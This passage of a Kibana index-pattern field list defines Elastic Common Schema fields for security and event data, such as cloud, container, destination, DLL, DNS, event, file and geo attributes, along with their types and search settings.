"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"client.user.name\"}}},{\"count\":0,\"name\":\"cloud.account.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.availability_zone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.instance.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.instance.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.machine.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.region\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.image.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.image.tag\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.runtime\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"destination.as.organization.name\"}}},{\"count\":0,\"name\":\"destination.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"destination.user.full_name\"}}},{\"count\":0,\"name\":\"destination.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"destination.user.name\"}}},{\"count\":0,\"name\":\"dll.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.class\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.data\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.ttl\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.header_flags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.op_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.class\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.subdomain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.resolved_ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.response_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"ecs.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"error.stack_trace\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"error.stack_trace.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"error.stack_trace\"}}},{\"count\":0,\"name\":\"error.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.action\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.dataset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.duration\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.end\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.ingested\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.kind\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.module\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"event.outcome\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score_norm\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.sequence\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.severity\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.timezone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.accessed\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.attributes\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.ctime\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.device\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.drive_letter\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.extension\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.gid\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.group\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.inode\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.mime_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.mode\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.mtime\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.owner\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.path\"}}},{\"count\":0,\"name\":\"file.pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.size\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.target_path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.target_path.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.target_path\"}}},{\"count\":0,\"name\":\"file.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.uid\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"k